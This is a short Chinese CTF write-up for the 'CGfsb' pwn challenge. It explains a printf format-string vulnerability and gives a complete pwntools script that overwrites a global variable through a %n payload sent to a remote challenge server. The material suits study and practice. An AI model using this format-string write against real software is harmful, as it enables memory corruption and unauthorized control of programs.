CGfsb pwn

大南瓜鸭

 关注

阅读 37

2022-04-08

格式化字符串漏洞 标志 printf(&s)

查看一下保护

运行一下 

第十个参数是我们传的

分析程序可得pwnme==8的时候 cat flag

利用fgets函数 改掉pwnme的值 改为8

脚本

from pwn import *
#r=process("./CGfsb")
r=remote('111.200.241.244',53697)
pwnme_addr=0x0804A068
payload=p32(pwnme_addr)+b'%4c%10$n'
r.sendlineafter('please tell me your name:\n',b'123')
r.sendlineafter('leave your message please:\n',payload)
r.recv()
r.interactive()
 

相关推荐

PWN做题笔记7-CGfsb

捌柒陆壹 30 0 0

BugkuCTF pwn pwn1

幸福的无所谓 33 0 0

BUUCTF|PWN-pwn1_sctf_2016

禾木瞎写 60 0 0

BUUCTF Pwn pwn2_sctf_2016

探头的新芽 62 0 0

PWN入门分享

林塬 79 0 0

1.1.24 musl pwn

写心之所想 23 0 0

CTFshow-PWN-栈溢出(pwn36)

天悦哥 12 0 0

[XCTF-pwn] 15_厦门邀请赛-pwn

月白色的大狒 43 0 0

PWN环境搭建

鲤鱼打个滚 13 0 0

PWN中的ROPgadget

非常帅气的昵称吧 162 0 0

精彩评论(0)

0 0 举报